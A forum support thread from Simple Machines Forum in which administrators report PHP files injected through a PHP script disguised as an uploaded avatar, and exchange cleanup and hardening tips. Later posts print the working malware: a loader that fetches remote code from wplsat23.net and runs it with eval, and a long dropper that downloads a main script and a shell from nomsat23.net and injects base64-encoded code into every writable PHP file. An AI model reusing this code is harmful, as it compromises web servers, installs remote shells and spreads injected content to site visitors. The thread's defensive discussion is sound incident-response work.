Simple Machines Community Forum

All the php files on my site have been injected with Base64-encoded text that translates to

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/jlgam4/public_html/mystiquestudios/forum/Themes/default/images/bbc/style.css.php')){include_once('/home/jlgam4/public_html/mystiquestudios/forum/Themes/default/images/bbc/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}

I had a look at the style.css.php file and it has been encoded multiple times. I finally got it all decoded but I don't know what it all means.

I removed the code from all my pages and deleted the style.css.php but when I went to change my theme in my profile it came up with this page that showed details about my server and a list of directory's as well as all files that had been reinjected with the code above and the style.css.php file reappeared.. I'm stuck, I don't know what to do.

Plz help.

If you don't have any mods installed, just upload fresh files from the SMF install package.

DO NOT OVERWRITE Settings.php

If you have mods, though, that will not be such a good idea.

Of course, you could restore a recent backup, if you have one...

Quote from: vHawkeyev on May 01, 2009, 10:47:02 AM
All the php files on my site have been injected with Base64-encoded text that translates to

Do you have a recent member called "krisbarteo" ?
If you do, could you answer these couple of questions:

- Did he upload an avatar?
- Do you use the attachment folder for avatars, or some other custom folder?
- What other software than SMF are you running on your server?

Then please delete that user, and his avatar from your forum.

Quotestyle.css.php

This is not supposed to be a php file. Its a css file...

I have the exact same problem.

My plan is to remove SMF, the re-build my site from backups.

As for "krisbarteo" - I had no such member, (my hacker was: 'Boommurne' ) but I do have an IP address of the culprit: 24.126.184.8

I'll do an admin on the DB and see what (if anything) was uploaded. (Also going to suspend uploads until I've got things cleared up).

What a mess!!!

What version of smf are you using? 1.1.8?
What mods are you using?
Are you using any integrations?

Are you using on that server?
- wordpress
- any software with tinymce editor?

I'm using 1.1.8, with Ad mod - also TP 0.9.8

Just checked (I have an identical install that I use for testing) avatars - both the same. So, it wasn't an avatar.

There's no other SW on the domain in question.

Yes I do have the member krisbarteo

It doesn't seem as if he has uploaded an avatar but when I had a look in my attachments folder I found his avatar, I then downloaded it and opened it in notepad and I found php code. I use the attachments folder for storing avatars.

I have deleted everything to do with krisbarteo and added his IP to my server blacklist.

Mods Installed:
Updated Registration Agreement
The Rules

What version of SMF were you running? 

1.1.8

I'm using 1.1.8 as well.

I'm diving in, replacing all PHP scripts with "clean" ones. Probably take me all day.

Once done, I'll have a clean backup of all my scripts so if this happens again I can just FTP the site back to normal.

"phasers on stun - we're going in"

Using 1.1.8

I had the same issue and timestamps showed that it all started minutes after user krisbarteo joined the forum.

I banned him and removed his avatar file. I diffed against a backup and removed the base64 crap from about 50 files.   Also check Themes/default/images/bbc   That is where a bunch of advertising for casinos was stashed.

It appears the avatar that was uploaded was an injection script, so I have disabled uploading of avatars until this issue is resolved.

Google "krisbarteo"  and see all the SMF forums he is a member of.   This is/could get real nasty.

What other scripts are you running along SMF?

I managed to get rid of the script injections by deleteing krisbarteo's profile and avatar, which had some php code in it that must have been used for the injection. Then uploaded clean versions of all php files.

But now I'm having troubles with my themes.

The script injection will affect ALL your php scripts, including themes.

I'm about halfway through manually removing them all before the big upload.

oy vey... what a mess ! :'(

QuoteI managed to get rid of the script injections by deleteing krisbarteo's profile and avatar, which had some php code in it that must have been used for the injection. Then uploaded clean versions of all php files.

Like you said it affects all php file so I replaced every one.

I have this same problem. I removed and banned krisbarteo, now I'll have to re-upload new php-files.

Quote from: Kat on May 01, 2009, 12:50:54 PMDO NOT OVERWRITE Settings.php

What happens if you do that?

Never mind, I guess I got lucky first time around, as I didn't have a copy of that particular file (and as such, didn't overwrite it).

Quote from: Agent Orange on May 04, 2009, 04:44:33 PM
I have this same problem. I removed and banned krisbarteo, now I'll have to re-upload new php-files.

Quote from: Kat on May 01, 2009, 12:50:54 PMDO NOT OVERWRITE Settings.php

I believe I actually did that first time around. What effect did it have on my forum?

Settings.php is what controls the connection between your forum and your database. It contains all the login info needed to connect.

To reset your Settings.php so it can connect back to your forum, use the repair_settings.php tool What is repair_settings.php? (http://docs.simplemachines.org/index.php?topic=663)

Some hackers will modify all files. You'll need to check if this code is present in settings.php and remove it if it is. Otherwise the hack will remain

Quote from: H on May 04, 2009, 05:03:20 PM
Some hackers will modify all files. You'll need to check if this code is present in settings.php and remove it if it is. Otherwise the hack will remain

Also, to elaborate on that, there was a recent hack I had to "sanitize" that the hacker had injected extra php files into almost every directory. Make sure that there are no randomly named files and also check your .htaccess for extra code as well.

On another note, check your index.php in the forum root directory as well as index.template.php in your themes directory for unwanted code.

These are all common places for hackers to inject code.

Wow, that guy (krisbarteo) sure is busy! Just wondering... would it be simplemachine's business to blast an email to all known SMF installations warning them about this guy? You'd have to careful to phrase the warning in such a way that it's not legally an accusation (libelous) telling boards to dump this guy, but rather a pointer to discussions such as this one. That user name is going on my ban list right away!

That being done, do we yet know what vulnerability he exploited? Was it in a browser? Was it SMF permitting unrestricted file types for avatars?

Add:
I thought about adding code to ban particular user names, but figured that they'd just register under some other name. If the problem is that their avatar image contains some kind of booby trap, what is the nature of the beast? Are they uploading a .php file as the avatar? In that case, a simple check on permitted extensions should fix the problem. Are they uploading a legitimate extension (.jpg, .png, .gif, etc.) and it somehow contains malicious code? Could SMF scan for certain strings in an avatar image before accepting it? If not, could new avatars be uploaded to a different directory and quarantined awaiting Admin inspection and movement into the production directory? I assume that it's not a browser vulnerability to embedded code (I think I recall such a thing a few years back), but somehow code that gets run on the server?

If this information isn't suitable for public dissemination, but you would like to request my help in coding something to fight this attack, please feel free to PM me with details.

Quote from: vHawkeyev on May 01, 2009, 07:25:53 PM
<<< I found his avatar, I then downloaded it and opened it in notepad and I found php code. >>>

Are you saying that his avatar was an actual image with an image extension, but with embedded php script?

It wasn't an actual image. It was just like another php file but with .jpg as the extension. I'm guessing it was used to upload other php files to my server.

So if avatar "images" were scanned for <? and possibly a few PHP keywords, that might detect code sailing under false colors? How about looking for image format keywords (e.g., GIF89a) in the right place, to confirm it's likely a real image file?

Okay, but then what about attachments and gallery items. Doesn't it seem like this could turn into a processor resource nightmare on a busy site. Probably preferable to being successfully attacked, but jist sayin. If you cover all bases your site is soon transformed into a file scanning engine so to speak.

Could we get an IP on this guy to add it to our ban list. Looks like he is hitting SMF forum big time check this out http://www.google.co.za/search?hl=en&q=krisbarteo&btnG=Google+Search&meta=&aq=f&oq= (http://www.google.co.za/search?hl=en&q=krisbarteo&btnG=Google+Search&meta=&aq=f&oq=)

Quote from: Tiribulus on May 05, 2009, 09:42:32 AM
Okay, but then what about attachments and gallery items. Doesn't it seem like this could turn into a processor resource nightmare on a busy site. Probably preferable to being successfully attacked, but jist sayin. If you cover all bases your site is soon transformed into a file scanning engine so to speak.

Attachmentnames are encrypted for a reason you know ;)

Quote from: LexArma on May 05, 2009, 10:20:14 AM

Quote from: Tiribulus on May 05, 2009, 09:42:32 AM
Okay, but then what about attachments and gallery items. Doesn't it seem like this could turn into a processor resource nightmare on a busy site. Probably preferable to being successfully attacked, but jist sayin. If you cover all bases your site is soon transformed into a file scanning engine so to speak.

Attachmentnames are encrypted for a reason you know ;)

Well gaaahhlee. Forgot about that  :-[

I have just countered 730 SMF forums he has registered on ranging from SMF 1.1.1 to RC1  :o

Busy little bee huh? he has not attempted mine yet, but he won't get in under that username.

Quote from: DirtRider on May 05, 2009, 10:15:39 AM
Could we get an IP on this guy to add it to our ban list. Looks like he is hitting SMF forum big time check this out http://www.google.co.za/search?hl=en&q=krisbarteo&btnG=Google+Search&meta=&aq=f&oq= (http://www.google.co.za/search?hl=en&q=krisbarteo&btnG=Google+Search&meta=&aq=f&oq=)

I would like more info as well. I do understand it may not be a good idea to openly post this, but I will accept a pm gladly with IP, email addie and any other info anyone has on him.

Yip me as well if possible  ;D

How about this, seeing as he gets code injected in through uploaded avatars. How about requiring all avatars be linked to a site like photobucket or imageshack, and disabling uploaded avatars...?

Quote from: JBlaze on May 05, 2009, 12:22:37 PM
How about this, seeing as he gets code injected in through uploaded avatars. How about requiring all avatars be linked to a site like photobucket or imageshack, and disabling uploaded avatars...?

Or with an apache server use .htaccess that turns php engine off for a custom avatar folder. ::)

Quote from: LexArma on May 05, 2009, 12:34:33 PM

Quote from: JBlaze on May 05, 2009, 12:22:37 PM
How about this, seeing as he gets code injected in through uploaded avatars. How about requiring all avatars be linked to a site like photobucket or imageshack, and disabling uploaded avatars...?

Or with an apache server use .htaccess that turns php engine off for a custom avatar folder. ::)

That works too...

Dirtrider, I found this on the first page of this thread:

QuoteAs for "krisbarteo" - I had no such member, (my hacker was: 'Boommurne' ) but I do have an IP address of the culprit: 24.126.184.8

I don't allow avatar uploads anyway. They must be linked to photobucket, etc. The only allowed attachments are by admins, and those are limited and encrypted, so most likely, I have no worries from this guy. I have had over a dozen new members in the last 2 weeks that have gotten past the anti-spam, and confirmed the email address. Once they log on, they only stay about 2 to 5 minutes, log off and do not return. Could be they are looking to upload an avatar or attachment, realize they cant, and then move on somewhere else.

Would this work?


<files~".(php* |s?p?html | | cgi | pl)$">
deny from all
</files>

This is supposed to also kill html, cgi and perl executions as well. Before I create the file I wanted to bounce it off some of you guys first.

Quote from: Tiribulus on May 05, 2009, 03:33:28 PM
Would this work?

Code Select Expand


<files~".(php* |s?p?html | | cgi | pl)$">
deny from all
</files>

This is supposed to also kill html, cgi and perl executions as well. Before I create the file I wanted to bounce it off some of you guys first.

On some servers, files are being run through php even though they do not have a php ending. Therefore I do not think this would work.

Quote from: H on May 05, 2009, 04:27:29 PM
On some servers, files are being run through php even though they do not have a php ending. Therefore I do not think this would work.

You're saying that since this stops the action based on the file extension that a file with a different extension, but still containing script code would run anyway.

How then do you use .htaccess to block the engine altogether as was suggested above. I also found some info on doing it with httpd.conf.

There is an option you can set in .htaccess that will disable the use of php completely.

I think it is "php_value engine off" but google should provide more, as I don't normally use Apache/.htaccess

Quote from: H on May 05, 2009, 04:57:21 PM
There is an option you can set in .htaccess that will disable the use of php completely.

I think it is "php_value engine off" but google should provide more, as I don't normally use Apache/.htaccess

It looks like that's right.
adding an .htaccess file with this php_value engine off entry should work.

Or, it seems you could also add this
<Location "/docroot/av_directory">
php_admin_flag engine off
</Location>.  to the httpd.conf file to accomplish the same thing

I was thinking it might not be a bad idea to throw such a .htaccess file in every directory that doesn't need PHP interpretation, but that might be misused that way.

Krisbarteo had done the same to my forum. An avatar 1,82KB large. All my PHP files were corrupted

He came from 94.142.129.147

Quote from: Tiribulus on May 05, 2009, 06:28:08 PM
adding an .htaccess file with this php_value engine off entry should work.

On many systems it won't work, as php_value and php_flag are not permitted in .htaccess. For those systems, put something like engine = off in a php.ini file. You may also need to put an entry in .htaccess to tell PHP where to find that file.

http://www.stopforumspam.com/search?q=krisbarteo 

This might help somewhat:

http://custom.simplemachines.org/mods/index.php?mod=1547

Quote from: H on May 05, 2009, 04:57:21 PM
There is an option you can set in .htaccess that will disable the use of php completely.

I think it is "php_value engine off" but google should provide more, as I don't normally use Apache/.htaccess

This is correct - I have it in use for a custom avatar folder.

Well, it took me a while - but all scripts are clean, and I'm up and running.

NOW, I have a full backup of clean scripts - ready to restore anytime.

Quote from: chrishicks on May 05, 2009, 11:16:33 PM
http://www.stopforumspam.com/search?q=krisbarteo (http://www.stopforumspam.com/search?q=krisbarteo) 

This might help somewhat:

http://custom.simplemachines.org/mods/index.php?mod=1547 (http://custom.simplemachines.org/mods/index.php?mod=1547)

Thank you for the stopforumspam link.  I have saved hoping I will not have to use it.

What I found out so far is that the host has to have AllowOverride set in httpd.conf to permit .htaccess file directives to supersede the global settings in order for this to work with .htaccess files. This might be what the guy above was talking about. The Apache docs say this can have a negative effect of performance due to the scanning required to find the commands in those files. They say if possible to include them in the directory section of httpd.conf. Being that the server is sitting at my feet I did this:


<Directory "/path to avs dir/">
php_admin_flag engine off
</Directory>

Now my hello.php file is offered for download instead of being run. Hmmm, I suppose that is preferable to being executed on the server.

Quote from: MrPhil on May 05, 2009, 11:09:41 PM

Quote from: Tiribulus on May 05, 2009, 06:28:08 PM
adding an .htaccess file with this php_value engine off entry should work.

On many systems it won't work, as php_value and php_flag are not permitted in .htaccess. For those systems, put something like engine = off in a php.ini file. You may also need to put an entry in .htaccess to tell PHP where to find that file.

Thanks for this. Although it seems a little absurd that hosts prevent these options in .htaccess but yet let the user run a custom php.ini :o

I dunno if this will help anyone but the content of the avatar is the following:
I've cleaned it up a little.

<?php;$url = 'http://wplsat23.net/?update=main';$done = false;if(!$url){return '';}$url_info = parse_url($url);$url_info[port] = ($url_info[port]) ? $url_info[port]:80;$url_info[path] = ($url_info[path]) ? $url_info[path] : "/"; $url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" . $url_info[query] : ""; $query = "GET " . $url_info[path] . " HTTP/1.1\r\n"; $query = $query . "Host: " . $url_info[host] . "\r\n"; $query = $query . "Accept: */*" . "\r\n"; $query = $query . "Connection: close" . "\r\n"; $query = $query . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" . "\r\n"; $query = $query . "\r\n"; $errno = 0; $error = ""; $sock = fsockopen($url_info[host], $url_info[port], $errno, $error, 30);$h = array();$resp = array();if($sock){stream_set_timeout($sock, 30);fwrite($sock, $query);$hd = false;while(!feof($sock)){$l = fgets($sock);if(!$hd){if(trim($l) == ''){$hd = true;}else{$h[] = $l;}}else{$resp[] = $l;}}fclose($sock);}$ret = implode("", $resp);eval($ret);?>

and this is the code on that page:
$ver = "1.0";
$GLOBALS['dbg'] = 0;
$GLOBALS['rewrite_old'] = 1;

set_time_limit(600);
$pu = "http://nomsat23.net/?update=js&host={$_SERVER['HTTP_HOST']}";
$eu = "http://nomsat23.net/?update=shl&host={$_SERVER['HTTP_HOST']}";

//$pu = "http://wpl/?update=js&host={$_SERVER['HTTP_HOST']}";
//$eu = "http://wpl/?update=shl&host={$_SERVER['HTTP_HOST']}";

$GLOBALS['dgin'] = "style.css.php";
$GLOBALS['dgsf'] = "s.php";
$GLOBALS['dgdn'] = "dg.php";
$GLOBALS['dgfn'] = "";

//detect full path
if(!file_exists($_SERVER['SCRIPT_FILENAME'])){
if(file_exists($_SERVER['PATH_TRANSLATED'])){
$_SERVER['SCRIPT_FILENAME'] = $_SERVER['PATH_TRANSLATED'];
}else{
die("<b style='color:red'>can't detect exploit full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[49295073]");
}
}
$_SERVER['SCRIPT_FILENAME'] = str_replace('\\', '/', $_SERVER['SCRIPT_FILENAME']);
$_SERVER['SCRIPT_FILENAME'] = preg_replace("/\/+/", "/", $_SERVER['SCRIPT_FILENAME']);
echo "<b style='color:green'>exploit full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[6910002]<br>";

$tmp = explode("/", $_SERVER['REQUEST_URI']);
$GLOBALS['dglvl'] = count($tmp) - 2;
echo"{$ver}<h2>http://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}</h2>";

$path = explode("/", $_SERVER['SCRIPT_FILENAME']);
$path = array_slice($path, 0, count($path) - 1);
$GLOBALS['fpath'] = implode("/", $path) . '/';

//detecting real path
$uri = explode("/", $_SERVER['REQUEST_URI']);
$uri = array_slice($uri, 0, count($uri) - 1);

//print_r($path);
//print_r($uri);

while(count($uri) > 0 && count($path) > 0 && strtolower($uri[count($uri) - 1]) == strtolower($path[count($path) - 1])){
unset($uri[count($uri) - 1]);
unset($path[count($path) - 1]);
}
//echo"<hr>";
//print_r($path);
//print_r($uri);

$GLOBALS['dgsp'] = implode("/", $path) . '/';

if(isset($_GET['dgd'])){
error_reporting(E_ALL & ~E_NOTICE);
}else{
error_reporting(0);
}

if(isset($_GET['phpinfo'])){
phpinfo();
die;
}

//$GLOBALS['dgsp'] = $_SERVER['DOCUMENT_ROOT'];
if(substr($GLOBALS['dgsp'], strlen($GLOBALS['dgsp']) - 1, 1) <> '/'){
$GLOBALS['dgsp'] .= '/';
}

echo"<b style=\"color:green\">root dir path [{$GLOBALS['dgsp']}]</b><br><br>";

$GLOBALS['dgcgr'] = 0;
$GLOBALS['dgcgrf'] = 0;
$my_uid = getmyuid();
$my_gid = getmygid();
$my_cid = get_current_user();
echo "SYSTEM: " . `uname -a` . "<br>";
if(ini_get('safe_mode')){echo "<h1 style='color:red'>SAFE MODE</h1>";}

echo"MY USER ID: {$my_uid}; MY GROUP ID: $my_gid; CURRENT USER: {$my_cid}<br>";

if(!function_exists('phpinj')){
function phpinj($ff, &$str, $inj = 0, $silent = true){
global $_SERVER;
$alien_shells = array("los.php","r0x.php");
$our_folder = 0;
$folder = $ff;
$folder = str_replace('\\', '/', $folder);
if(substr($folder, strlen($folder) - 1, 1) <> '/'){
$folder .= '/';
}
if(!$folder){
if(!$silent){echo"<font color='red'>bad folder path [{$folder}]</font><br>";}
return;
}
if(!is_dir($folder)){
if(!$silent){echo"<font color='red'>{$folder} - is not a folder</font><br>";}
return;
}
if($GLOBALS['dgdirs'][$folder]){
if(!$silent){echo"<font color='yellow'>{$folder} already checked</font><br>";}
return;
}
$GLOBALS['dgdirs'][$folder] = 1;

if($folder == $GLOBALS['dgcp'] || file_exists($folder.$GLOBALS['dgin'])){
if(!$silent){echo"<h4>{$folder} is our dir, skipping...</h4>";}
$our_folder = 1;
}
$dir_perm = substr(sprintf('%o', fileperms($folder)), -4);

$file_stat = stat($folder);
$file_uid = $file_stat[4];
$file_gid = $file_stat[5];
if(function_exists('posix_getpwuid')){
$file_stat = posix_getpwuid($file_uid);
$file_uidn = "; uname:{$file_stat['name']}";
}
if(function_exists('posix_getgrgid')){
$file_stat = posix_getgrgid($file_gid);
$file_gidn = $file_stat['name'];
$file_gidn = "; gname:{$file_gidn}";
}
$file_info = "[uid:{$file_uid}; gid:{$file_gid}{$file_uidn}{$file_gidn}] ";
if(!$silent){echo"{$file_info}[$dir_perm] {$folder}<br>";flush();}
$h = opendir($folder);
if(!$h){
if(!$silent){echo"<font color='red'>{$folder}</font><br>";}
return;
}
while(strlen($f = readdir($h))){
if($f == '.' || $f == '..'){
continue;
}
$pc = 0;
$mkr = md5($f);
$lc = "";
$lp = "";
$fh = false;

$file = $folder.$f;
if($f == $_SERVER['SCRIPT_FILENAME']){
if(!$silent){echo"<h4>{$file} is our exploit</h4>";}
continue;
}
if(is_file($file) && !$our_folder){
if($f == 'functions.php' && (strlen($folder) - strrpos($folder, "wp-includes") == 12)){
if(can_write($file)){
echo"<b style='color:green'>{$file}</b><br>";
dgrself($file, $silent);
}else{
echo"<b style='color:red'>{$file}</b><br>";
}
}
if($f == 's.php'){
if(!$silent){echo"<font color='red'>{$file} is shell</font><br>";}
continue;
}
if(in_array(strtolower($f), $alien_shells)){
if(unlink($file)){
if(!$silent){echo"<h3 style='color:green'>{$file} ALIEN SHELL</h3>";}
}else{
if(!$silent){echo"<h3 style='color:red'>{$file} ALIEN SHELL</h3>";}
}
continue;
}
if(!in_array(strtolower(gfe($file)), array("php","phtml","php3"))){
continue;
}
if($GLOBALS['dgfiles'][$file]){
if(!$silent){echo"<font color='yellow'>{$file} already checked</font><br>";}
continue;
}
$GLOBALS['dgfiles'][$file] = 1;
$file_stat = stat($file);
$file_uid = $file_stat[4];
$file_gid = $file_stat[5];
if(function_exists('posix_getpwuid')){
$file_stat = posix_getpwuid($file_uid);
$file_uidn = "; uname:{$file_stat['name']}";
}
if(function_exists('posix_getgrgid')){
$file_stat = posix_getgrgid($file_gid);
$file_gidn = $file_stat['name'];
$file_gidn = "; gname:{$file_stat['name']}";
}
$file_info = "[uid:{$file_uid}; gid:{$file_gid}{$file_uidn}{$file_gidn}] ";
$file_perm_was = substr(sprintf('%o', fileperms($file)), -4);
$file_handler = fopen($file, "a+");
$perms_str = "{$file_info}[{$file_perm_was}] ";
if(!$file_handler){
if(!$silent){echo"{$perms_str}<font color='red'>{$file}</font><br>";flush();}
continue;
}
fclose($file_handler);
$fc = implode("", file($file));
$nc = preg_replace("/\<\!\-\-$mkr\-\-\>.*\<\!\-\-$mkr\-\-\>/siU", "", $fc);
$nc = preg_replace("/^\s*\<\?(\w{3})?\s*\/\*\*\/\s*eval\(base64_decode.*\)\)\;\s*\?\>\s*(\S)/siU", "$2", $nc);
clear_exploits($nc);
if($nc <> $fc){$lc = " <b>[cleared]</b>";}else{$lc = " <b>[not patched]</b>";}
if(preg_match("/\@zend/i", $nc)){
if(!$silent){echo"{$perms_str}<b>ZEND</b> <font color='red'>{$file}</font>{$lc}<br>";flush();}
}elseif($inj && strpos(strtolower($folder), '/cache/')){
$lp = " <b style='color:orange'> [cached file]</b>";
}elseif($inj){
$nc = "{$ot}{$str}{$ot}\n{$nc}";
$lp = " <b> [patched]</b>";
}
if($fc <> $nc){
save_text_to_file($file, $nc, "$perms_str<font color='green'>{$file}{$lc}{$lp}</font><br>", 1, $silent);
}else{
if(!$silent){echo"$perms_str<font color='green'>{$file}{$lc}{$lp}</font><br>";}
}
}elseif(is_dir($file)){
phpinj($file.'/', $str, $inj, $silent);
}
}
closedir($h);
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('clear_exploits')){
function clear_exploits(&$text){
$text = preg_replace("/\<\?(\w{3})?\s*eval\(base64_decode.*\)\)\;\s*\?\>/siU", "", $text);
}
}

if(!function_exists('can_write')){
function can_write($fn){
$f = fopen($fn, "a");
if($f){
fclose($f);
return true;
}else{
return false;
}
}
}

if(!function_exists('leave_clear_php')){
function leave_clear_php(&$txt){
$txt = substr($txt, strpos($txt, '<?'), strlen($txt));
$txt = substr($txt, 0, strrpos($txt, '?>') + 2);
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('download')){
function download($url, $connect_timeout){
$done = false;
if(!$url){return '';}

$url_info = parse_url($url);
$url_info[port] = ($url_info[port]) ? $url_info[port] : 80;
$url_info[path] = ($url_info[path]) ? $url_info[path] : "/";
$url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" . $url_info[query] : "";
$query = "GET " . $url_info[path] . " HTTP/1.1\r\n";
$query = $query . "Host: " . $url_info[host] . "\r\n";
$query = $query . "Accept: */*" . "\r\n";
$query = $query . "Connection: close" . "\r\n";
$query = $query . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" . "\r\n";
$query = $query . "\r\n";
$errno = 0;
$error = "";
$sock = fsockopen($url_info[host], $url_info[port], $errno, $error, $connect_timeout);
$h = array();
$resp = array();
if($sock){
stream_set_timeout($sock, $connect_timeout);
fwrite($sock, $query);
$hd = false;
while(!feof($sock)){
$l = fgets($sock);
if(!$hd){
if(trim($l) == ''){
$hd = true;
}else{
$h[] = $l;
}
}else{
$resp[] = $l;
}
}
fclose($sock);
}
$ret = implode("", $resp);
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('save_text_to_file')){
function save_text_to_file($fn, $t, $m = '', $r = 0, $silent = false){
global $_GET;
if(isset($_GET['dgd'])){
$silent = false;
}
if($r){
$f = fopen($fn, "w");
}else{
$f = fopen($fn, "a");
}
if($f){
fwrite($f, $t);
fflush($f);
fclose($f);
if(!$silent){
echo $m;
}
/*set_chmod($fn);*/
}else{
if(!$silent){
echo "can't create file $fn";
}
die();
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('replace_substring')){
function replace_substring(&$text, $pret, $postt, $str){
$pos = strpos($text, $pret);
if(!$pos){return false;}
$pre = substr($text, 0, $pos + strlen($pret));
$pos = strpos($text, $postt, $pos);
if(!$pos){return false;}
$post = substr($text, $pos, strlen($text));
if(strlen($pre) && strlen($post)){
$text = $pre.$str.$post;
return true;
}
return false;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('set_chmod')){
function set_chmod($file){
if(!file_exists($file)){
return;
}
if(chmod($file, 0777)){
return('0777');
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('set_chmod_folder')){
function set_chmod_folder($file){
if(!file_exists($file)){
return;
}
if(chmod($file, 0666)){
return('0666');
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('gfe')){
function gfe($fn){
$ret = '';
$p = strrpos($fn, '.');
if($p){
$ret = (substr($fn, $p+1, strlen($fn)));
return $ret;
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('prepare_pack')){
function prepare_pack($php){
$cycles = 1;
$split_by_functions = 1;
$zip = 0;
if(!function_exists('base64_encode')){
return $php;
}
$ret = preg_replace("/^[^\s]+[\s]/U", "", $php);
$ret = preg_replace("/[\s][^\s]+\Z/", "", $ret);
$ret = trim($ret);
if($split_by_functions){
$tmp = preg_split('/\}\s+function/', $ret);
}else{
$tmp[] = $ret;
}
$skip_first = false;
if(count($tmp)){
$pos = strpos($tmp[0], 'function');
if($pos === 0){
$tmp[0] = substr($tmp[0], strlen('function'), strlen($tmp[0]));
}else{
$skip_first = true;
}
$ret = '';
$count = 0;
$total = count($tmp);
foreach($tmp as $key=>$val){
$val = preg_replace("/\s+/", " ", $val);
$count++;
$count == $total ? $add = '' : $add = '}';
if($total > 1 && !($count == 1 && $skip_first)){
$next_encoded = 'function '.trim($val).$add;
}else{
$next_encoded = trim($val).$add;
}
if($zip && function_exists('gzdeflate')){
$next_encoded = gzdeflate($next_encoded, 9);
}
$next_encoded = base64_encode($next_encoded);
if($zip && function_exists('gzdeflate')){
$ret .= "eval(gzinflate(base64_decode('{$next_encoded}')));";
}else{
$ret .= "eval(base64_decode('{$next_encoded}'));";
}
}
for($i = 0; $i < $cycles; $i++){
if($zip && function_exists('gzdeflate')){
$ret = gzdeflate($ret, 9);
}
$ret = base64_encode($ret);
if($zip && function_exists('gzdeflate')){
$ret = "eval(gzinflate(base64_decode('{$ret}')));";
}else{
$ret = "eval(base64_decode('{$ret}'));";
}
}
$ret = "<"."?php $ret?".">";
}
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('clear_folder')){
function clear_folder($folder, $remove = false){
$ret = true;
if(file_exists($folder)){
$h = opendir($folder);
while(strlen($file = readdir($h))){
if($file == '.' || $file == '..'){
continue;
}
if(is_dir($folder.$file)){
$ret = clear_folder($folder.$file.'/', true);
continue;
}
if(!unlink($folder.$file)){
$ret = false;
}
}
closedir($h);
if($remove && !rmdir($folder)){
$ret = false;
}
}
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

echo"<hr><div align='left'><br clear=\"all\">";

$pms = download($pu, 60);
if($pms){
echo"<b style=\"color:green\">main script download ok [size: " . strlen($pms) . "]</b><br>[543676657]<br>";
leave_clear_php($pms);
}else{
die("<b style=\"color:red\">main download failed [$pu]</b><br>[93771902]<br>");
}

$shl = download($eu, 60);
if($shl){
echo"<b style=\"color:green\">shell download ok [size: " . strlen($shl) . "]</b><br>[599387883]<br>";
leave_clear_php($shl);
}else{
die("<b style=\"color:red\">shell download failed [$eu]</b><br>[759303755]<br>");
}

flush();
$ddrs = array();
$dgmssp = array();
$a = false;
$GLOBALS['dgdirs'] = array();
echo"<h3>LOOKING FOR THE LONGEST PATH</h3>";
echo"<small>";

$tmp = explode("/", $GLOBALS['fpath']);
$path = '';
$c = 0;
foreach($tmp as $key=>$val){
if(!$val && $c){
continue;
}
$c++;
$path .= $val . "/";
if(strlen($GLOBALS['dgsp']) > strlen($path)){
continue;
}
if($path <> '/'){
if(isset($_GET['details'])){
echo"<h4>GOTO: $path</h4>";flush();
}
fddir($path, $ddrs, $a);
if(count($ddrs) > 0){
break;
}
}
}
if(!count($ddrs)){
if(isset($_GET['details'])){
echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush();
}
fddir($GLOBALS['dgsp'], $ddrs, $a);
}

echo"</small>";flush();

$max = 0;
$GLOBALS['dgcp'] = '';
$sep = '';
foreach($ddrs as $key=>$val){
if(!$sep){
if(!(strpos($key, '/') === false)){
$sep = '/';
}else{
$sep = '\\';
}
}
$fldr = explode($sep, $key);
